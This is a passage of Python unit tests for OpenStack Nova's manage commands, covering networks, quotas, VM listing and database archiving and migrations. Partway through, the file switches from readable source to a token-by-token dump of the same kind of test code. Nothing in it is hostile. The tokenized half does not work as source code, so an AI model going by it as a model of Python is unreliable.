            self.assertEqual(kwargs['vlan_start'], 201)
            self.assertEqual(kwargs['vpn_start'], 2000)
            self.assertEqual(kwargs['cidr_v6'], 'fd00:2::/120')
            self.assertEqual(kwargs['gateway'], '10.2.0.1')
            self.assertEqual(kwargs['gateway_v6'], 'fd00:2::22')
            self.assertEqual(kwargs['bridge'], 'br200')
            self.assertEqual(kwargs['bridge_interface'], 'eth0')
            self.assertEqual(kwargs['dns1'], '8.8.8.8')
            self.assertEqual(kwargs['dns2'], '8.8.4.4')
        self.flags(network_manager='nova.network.manager.VlanManager')
        from nova.network import manager as net_manager
        self.stubs.Set(net_manager.VlanManager, 'create_networks',
                       fake_create_networks)
        self.commands.create(
            label='Test',
            cidr='10.2.0.0/24',
            num_networks=1,
            network_size=256,
            multi_host='F',
            vlan=200,
            vlan_start=201,
            vpn_start=2000,
            cidr_v6='fd00:2::/120',
            gateway='10.2.0.1',
            gateway_v6='fd00:2::22',
            bridge='br200',
            bridge_interface='eth0',
            dns1='8.8.8.8',
            dns2='8.8.4.4',
            uuid='aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa')

    def test_list(self):

        def fake_network_get_all(context):
            return [db_fakes.FakeModel(self.net)]
        self.stub_out('nova.db.network_get_all', fake_network_get_all)
        output = StringIO()
        sys.stdout = output
        self.commands.list()
        sys.stdout = sys.__stdout__
        result = output.getvalue()
        _fmt = "\t".join(["%(id)-5s", "%(cidr)-18s", "%(cidr_v6)-15s",
                          "%(dhcp_start)-15s", "%(dns1)-15s", "%(dns2)-15s",
                          "%(vlan)-15s", "%(project_id)-15s", "%(uuid)-15s"])
        head = _fmt % {'id': 'id',
                       'cidr': 'IPv4',
                       'cidr_v6': 'IPv6',
                       'dhcp_start': 'start address',
                       'dns1': 'DNS1',
                       'dns2': 'DNS2',
                       'vlan': 'VlanID',
                       'project_id': 'project',
                       'uuid': "uuid"}
        body = _fmt % {'id': self.net['id'],
                       'cidr': self.net['cidr'],
                       'cidr_v6': self.net['cidr_v6'],
                       'dhcp_start': self.net['dhcp_start'],
                       'dns1': self.net['dns1'],
                       'dns2': self.net['dns2'],
                       'vlan': self.net['vlan'],
                       'project_id': self.net['project_id'],
                       'uuid': self.net['uuid']}
        answer = '%s\n%s\n' % (head, body)
        self.assertEqual(result, answer)

    def test_delete(self):
        self.fake_net = self.net
        self.fake_net['project_id'] = None
        self.fake_net['host'] = None
        self.stub_out('nova.db.network_get_by_uuid',
                      self.fake_network_get_by_uuid)

        def fake_network_delete_safe(context, network_id):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(network_id, self.fake_net['id'])
        self.stub_out('nova.db.network_delete_safe', fake_network_delete_safe)
        self.commands.delete(uuid=self.fake_net['uuid'])

    def test_delete_by_cidr(self):
        self.fake_net = self.net
        self.fake_net['project_id'] = None
        self.fake_net['host'] = None
        self.stub_out('nova.db.network_get_by_cidr',
                      self.fake_network_get_by_cidr)

        def fake_network_delete_safe(context, network_id):
            self.assertTrue(context.to_dict()['is_admin'])
            self.assertEqual(network_id, self.fake_net['id'])
        self.stub_out('nova.db.network_delete_safe', fake_network_delete_safe)
        self.commands.delete(fixed_range=self.fake_net['cidr'])

    def _test_modify_base(self, update_value, project, host, dis_project=None,
                          dis_host=None):
        self.fake_net = self.net
        self.fake_update_value = update_value
        self.stub_out('nova.db.network_get_by_cidr',
                      self.fake_network_get_by_cidr)
        self.stub_out('nova.db.network_update', self.fake_network_update)
        self.commands.modify(self.fake_net['cidr'], project=project, host=host,
                             dis_project=dis_project, dis_host=dis_host)

    def test_modify_associate(self):
        self._test_modify_base(update_value={'project_id': 'test_project',
                                             'host': 'test_host'},
                               project='test_project', host='test_host')

    def test_modify_unchanged(self):
        self._test_modify_base(update_value={}, project=None, host=None)

    def test_modify_disassociate(self):
        self._test_modify_base(update_value={'project_id': None, 'host': None},
                               project=None, host=None, dis_project=True,
                               dis_host=True)

class NeutronV2NetworkCommandsTestCase(test.NoDBTestCase):
    def setUp(self):
        super(NeutronV2NetworkCommandsTestCase, self).setUp()
        self.flags(use_neutron=True)
        self.commands = manage.NetworkCommands()

    def test_create(self):
        self.assertEqual(2, self.commands.create())

    def test_list(self):
        self.assertEqual(2, self.commands.list())

    def test_delete(self):
        self.assertEqual(2, self.commands.delete())

    def test_modify(self):
        self.assertEqual(2, self.commands.modify('192.168.0.1'))

DECL|class|ProjectCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'ProjectCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ProjectCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'ProjectCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_quota
dedent|''
name|'def'
name|'test_quota'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'quota'
op|'('
name|'project_id'
op|'='
string|"'admin'"
op|','
nl|'\n'
name|'key'
op|'='
string|"'instances'"
op|','
nl|'\n'
name|'value'
op|'='
string|"'unlimited'"
op|','
nl|'\n'
op|')'
newline|'\n'
nl|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'print_format'
op|'='
string|'"%-36s %-10s"'
op|'%'
op|'('
string|"'instances'"
op|','
string|"'unlimited'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'print_format'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_quota_update_invalid_key
dedent|''
name|'def'
name|'test_quota_update_invalid_key'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'2'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'quota'
op|'('
string|"'admin'"
op|','
string|"'volumes1'"
op|','
string|"'10'"
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|VmCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'VmCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'VmCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'VmCommands'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'fake_flavor'
op|'='
name|'objects'
op|'.'
name|'Flavor'
op|'('
op|'**'
name|'test_flavors'
op|'.'
name|'DEFAULT_FLAVORS'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list_without_host
dedent|''
name|'def'
name|'test_list_without_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'InstanceList'
op|','
string|"'get_by_filters'"
op|')'
name|'as'
name|'get'
op|':'
newline|'\n'
indent|' '
name|'get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstanceList'
op|'('
nl|'\n'
name|'objects'
op|'='
op|'['
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
name|'host'
op|'='
string|"'foo-host'"
op|','
nl|'\n'
name|'flavor'
op|'='
name|'self'
op|'.'
name|'fake_flavor'
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
op|'}'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'node'"
op|','
name|'result'
op|')'
comment|'# check the header line'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'m1.tiny'"
op|','
name|'result'
op|')'
comment|'# flavor.name'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'foo-host'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_list_with_host
dedent|''
name|'def'
name|'test_list_with_host'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'output'
op|'='
name|'StringIO'
op|'('
op|')'
newline|'\n'
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'output'
newline|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'objects'
op|'.'
name|'InstanceList'
op|','
string|"'get_by_host'"
op|')'
name|'as'
name|'get'
op|':'
newline|'\n'
indent|' '
name|'get'
op|'.'
name|'return_value'
op|'='
name|'objects'
op|'.'
name|'InstanceList'
op|'('
nl|'\n'
name|'objects'
op|'='
op|'['
name|'fake_instance'
op|'.'
name|'fake_instance_obj'
op|'('
nl|'\n'
name|'context'
op|'.'
name|'get_admin_context'
op|'('
op|')'
op|','
nl|'\n'
name|'flavor'
op|'='
name|'self'
op|'.'
name|'fake_flavor'
op|','
nl|'\n'
name|'system_metadata'
op|'='
op|'{'
op|'}'
op|')'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'list'
op|'('
name|'host'
op|'='
string|"'fake-host'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'sys'
op|'.'
name|'stdout'
op|'='
name|'sys'
op|'.'
name|'__stdout__'
newline|'\n'
name|'result'
op|'='
name|'output'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'node'"
op|','
name|'result'
op|')'
comment|'# check the header line'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'m1.tiny'"
op|','
name|'result'
op|')'
comment|'# flavor.name'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'fake-host'"
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|DBCommandsTestCase
dedent|''
dedent|''
name|'class'
name|'DBCommandsTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DBCommandsTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'='
name|'manage'
op|'.'
name|'DbCommands'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_negative
dedent|''
name|'def'
name|'test_archive_deleted_rows_negative'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
op|'-'
number|'1'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_large_number
dedent|''
name|'def'
name|'test_archive_deleted_rows_large_number'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'large_number'
op|'='
string|"'1'"
op|'*'
number|'100'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
name|'large_number'
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'archive_deleted_rows'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'dict'
op|'('
name|'instances'
op|'='
number|'10'
op|','
name|'consoles'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
DECL|member|_test_archive_deleted_rows
name|'def'
name|'_test_archive_deleted_rows'
op|'('
name|'self'
op|','
name|'mock_db_archive'
op|','
name|'verbose'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
number|'20'
op|','
name|'verbose'
op|'='
name|'verbose'
op|')'
newline|'\n'
name|'mock_db_archive'
op|'.'
name|'assert_called_once_with'
op|'('
number|'20'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'if'
name|'verbose'
op|':'
newline|'\n'
indent|' '
name|'expected'
op|'='
string|"'''\\\n+-----------+-------------------------+\n| Table | Number of Rows Archived |\n+-----------+-------------------------+\n| consoles | 5 |\n| instances | 10 |\n+-----------+-------------------------+\n'''"
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'len'
op|'('
name|'output'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows
dedent|''
dedent|''
name|'def'
name|'test_archive_deleted_rows'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|"# Tests that we don't show any table output (not verbose)."
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_archive_deleted_rows'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_archive_deleted_rows_verbose
dedent|''
name|'def'
name|'test_archive_deleted_rows_verbose'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Tests that we get table output.'
nl|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_archive_deleted_rows'
op|'('
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'db'
op|','
string|"'archive_deleted_rows'"
op|','
name|'return_value'
op|'='
op|'{'
op|'}'
op|')'
newline|'\n'
DECL|member|test_archive_deleted_rows_verbose_no_results
name|'def'
name|'test_archive_deleted_rows_verbose_no_results'
op|'('
name|'self'
op|','
name|'mock_db_archive'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'archive_deleted_rows'
op|'('
number|'20'
op|','
name|'verbose'
op|'='
name|'True'
op|')'
newline|'\n'
name|'mock_db_archive'
op|'.'
name|'assert_called_once_with'
op|'('
number|'20'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'Nothing was archived.'"
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'migration'
op|','
string|"'db_null_instance_uuid_scan'"
op|','
nl|'\n'
name|'return_value'
op|'='
op|'{'
string|"'foo'"
op|':'
number|'0'
op|'}'
op|')'
newline|'\n'
DECL|member|test_null_instance_uuid_scan_no_records_found
name|'def'
name|'test_null_instance_uuid_scan_no_records_found'
op|'('
name|'self'
op|','
name|'mock_scan'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'null_instance_uuid_scan'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"There were no records found"'
op|','
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'migration'
op|','
string|"'db_null_instance_uuid_scan'"
op|','
nl|'\n'
name|'return_value'
op|'='
op|'{'
string|"'foo'"
op|':'
number|'1'
op|','
string|"'bar'"
op|':'
number|'0'
op|'}'
op|')'
newline|'\n'
DECL|member|_test_null_instance_uuid_scan
name|'def'
name|'_test_null_instance_uuid_scan'
op|'('
name|'self'
op|','
name|'mock_scan'
op|','
name|'delete'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'useFixture'
op|'('
name|'fixtures'
op|'.'
name|'MonkeyPatch'
op|'('
string|"'sys.stdout'"
op|','
nl|'\n'
name|'StringIO'
op|'('
op|')'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'null_instance_uuid_scan'
op|'('
name|'delete'
op|')'
newline|'\n'
name|'output'
op|'='
name|'sys'
op|'.'
name|'stdout'
op|'.'
name|'getvalue'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'if'
name|'delete'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"Deleted 1 records from table \'foo\'."'
op|','
name|'output'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"Deleted 0 records from table \'bar\'."'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertIn'
op|'('
string|'"1 records in the \'foo\' table"'
op|','
name|'output'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"0 records in the \'bar\' table"'
op|','
name|'output'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertNotIn'
op|'('
string|'"There were no records found"'
op|','
name|'output'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_null_instance_uuid_scan_readonly
dedent|''
name|'def'
name|'test_null_instance_uuid_scan_readonly'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_null_instance_uuid_scan'
op|'('
name|'delete'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_null_instance_uuid_scan_delete
dedent|''
name|'def'
name|'test_null_instance_uuid_scan_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_null_instance_uuid_scan'
op|'('
name|'delete'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_version'"
op|','
name|'return_value'
op|'='
number|'2'
op|')'
newline|'\n'
DECL|member|test_version
name|'def'
name|'test_version'
op|'('
name|'self'
op|','
name|'sqla_migrate'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'version'
op|'('
op|')'
newline|'\n'
name|'sqla_migrate'
op|'.'
name|'assert_called_once_with'
op|'('
name|'database'
op|'='
string|"'main'"
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'sqla_migration'
op|','
string|"'db_sync'"
op|')'
newline|'\n'
DECL|member|test_sync
name|'def'
name|'test_sync'
op|'('
name|'self'
op|','
name|'sqla_sync'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'commands'
op|'.'
name|'sync'
op|'('
name|'version'
op|'='
number|'4'
op|')'
newline|'\n'
name|'sqla_sync'
op|'.'
name|'assert_called_once_with'
op|'('
name|'version'
op|'='
number|'4'
op|','
name|'database'
op|'='
string|"'main'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_fake_db_command
dedent|''
name|'def'
name|'_fake_db_command'
op|'('
name|'self'
op|','
name|'migrations'
op|'='
name|'None'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'migrations'
name|'is'
name|'None'
op|':'
newline|'\n'
indent|' '
name|'mock_mig_1'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
name|'__name__'
op|'='
string|'"mock_mig_1"'
op|')'
newline|'\n'
name|'mock_mig_2'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
name|'__name__'
op|'='
string|'"mock_mig_2"'
op|')'
newline|'\n'
name|'mock_mig_1'
op|'.'
name|'return_value'
op|'='
op|'('
number|'5'
op|','
number|'4'
op|')'
newline|'\n'
name|'mock_mig_2'
op|'.'
name|'return_value'
op|'='
op|'('
number|'6'
op|','
number|'6'
op|')'
newline|'\n'
name|'migrations'
op|'='
op|'('
name|'mock_mig_1'
op|','
name|'mock_mig_2'
op|')'
newline|'\n'
nl|'\n'
DECL|class|_CommandSub
dedent|''
name|'class'
name|'_CommandSub'
op|'('
name|'manage'
op|'.'
name|'DbCommands'
op|')'
op|':'
newline|'\n'
DECL|variable|online_migrations
indent|' '
name|'online_migrations'
op|'='
name|'migrations'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'_CommandSub'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.context.get_admin_context'"
op|')'
newline|'\n'
DECL|member|test_online_migrations
name|'def'
name|'test_online_migrations'
op|'('
name|'self'
op|','
name|'mock_get_context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ctxt'
op|'='
name|'mock_get_context'
op|'.'
name|'return_value'
newline|'\n'
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
number|'10'
op|')'
newline|'\n'
name|'command_cls'
op|'.'
name|'online_migrations'
op|'['
number|'0'
op|']'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
number|'10'
op|')'
newline|'\n'
name|'command_cls'
op|'.'
name|'online_migrations'
op|'['
number|'1'
op|']'
op|'.'
name|'assert_called_once_with'
op|'('
name|'ctxt'
op|','
number|'6'
op|')'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.context.get_admin_context'"
op|')'
newline|'\n'
DECL|member|test_online_migrations_no_max_count
name|'def'
name|'test_online_migrations_no_max_count'
op|'('
name|'self'
op|','
name|'mock_get_context'
op|')'
op|':'
newline|'\n'
indent|' '
name|'total'
op|'='
op|'['
number|'120'
op|']'
newline|'\n'
name|'batches'
op|'='
op|'['
number|'50'
op|','
number|'40'
op|','
number|'30'
op|','
number|'0'
op|']'
newline|'\n'
name|'runs'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_migration
name|'def'
name|'fake_migration'
op|'('
name|'context'
op|','
name|'count'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock_get_context'
op|'.'
name|'return_value'
op|','
name|'context'
op|')'
newline|'\n'
name|'runs'
op|'.'
name|'append'
op|'('
name|'count'
op|')'
newline|'\n'
name|'count'
op|'='
name|'batches'
op|'.'
name|'pop'
op|'('
number|'0'
op|')'
newline|'\n'
name|'total'
op|'['
number|'0'
op|']'
op|'-='
name|'count'
newline|'\n'
name|'return'
name|'total'
op|'['
number|'0'
op|']'
op|','
name|'count'
newline|'\n'
nl|'\n'
dedent|''
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|'('
name|'fake_migration'
op|','
op|')'
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
name|'None'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'batches'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'total'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'50'
op|','
number|'50'
op|','
number|'50'
op|','
number|'50'
op|']'
op|','
name|'runs'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_error
dedent|''
name|'def'
name|'test_online_migrations_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_migration'
op|'='
name|'mock'
op|'.'
name|'MagicMock'
op|'('
op|')'
newline|'\n'
name|'fake_migration'
op|'.'
name|'side_effect'
op|'='
name|'Exception'
newline|'\n'
name|'command_cls'
op|'='
name|'self'
op|'.'
name|'_fake_db_command'
op|'('
op|'('
name|'fake_migration'
op|','
op|')'
op|')'
newline|'\n'
name|'command'
op|'='
name|'command_cls'
op|'('
op|')'
newline|'\n'
name|'command'
op|'.'
name|'online_data_migrations'
op|'('
name|'None'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_bad_max
dedent|''
name|'def'
name|'test_online_migrations_bad_max'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
op|'-'
number|'2'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
string|"'a'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'127'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'0'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_no_max
dedent|''
name|'def'
name|'test_online_migrations_no_max'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_finished
dedent|''
dedent|''
name|'def'
name|'test_online_migrations_finished'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'0'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_online_migrations_not_finished
dedent|''
dedent|''
name|'def'
name|'test_online_migrations_not_finished'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'commands'
op|','
string|"'_run_migration'"
op|')'
name|'as'
name|'rm'
op|':'
newline|'\n'
indent|' '
name|'rm'
op|'.'
name|'return_value'
op|'='
number|'5'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
nl|'\n'
name|'self'
op|'.'
name|'commands'
op|'.'
name|'online_data_migrations'
op|'('
name|'max_count'
op|'='
number|'5'
op|')'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ApiDbCommandsTestCase
dedent|''
